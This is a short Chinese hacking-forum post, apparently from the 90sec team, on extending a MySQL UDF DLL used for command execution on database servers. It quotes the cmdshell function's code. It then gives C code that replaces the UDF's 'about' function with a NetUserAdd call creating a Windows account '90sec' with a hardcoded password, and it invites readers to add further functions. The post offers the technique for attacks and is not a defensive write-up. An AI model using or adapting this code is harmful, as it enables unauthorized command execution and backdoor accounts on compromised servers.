*Author:mer4en7y
Team:90sec
声明:UDF源码作者langouster
*/
相信各位牛对UDF都不会陌生,看论坛叶总共享了一份UDF源码,以前一直没看过,于是看了看,写了这篇垃圾文章,再此抛砖引玉了,望大牛勿笑!
cmdshell函数大家都不会陌生
GetSystemDirectory(ShellPath,MAX_PATH-1);
strcat(ShellPath,"\\cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-1);
strcat(TempFilePath,"\\2351213.tmp");
这里调用的是system32下的cmd,如果删除了那么函数就会失败,我们如何来发散一下呢
其实工具只是一个辅助,看下面一段简单代码:
这是一段用API函数添加普通用户的代码,我将原先的about函数稍微修改一下,替换为下面的代码
NET_API_STATUS ret=0;
DWORD dwErr=0;
USER_INFO_1 oUserInfo;
ZeroMemory(&oUserInfo,sizeof(oUserInfo));
oUserInfo.usri1_name=L"90sec";
oUserInfo.usri1_password=L"90sec";
oUserInfo.usri1_priv=USER_PRIV_USER;
oUserInfo.usri1_flags=UF_NORMAL_ACCOUNT;
ret=NetUserAdd(NULL,1,(LPBYTE)(&oUserInfo),&dwErr);
if(ret== NERR_Success)
{
initid->ptr=(char *)malloc(100);
strcpy(initid->ptr,"执行成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
结果如图:
成功添加普通用户:
各位牛可以自由发挥,添加一些其他功能函数,再此抛砖引玉了,谢谢观看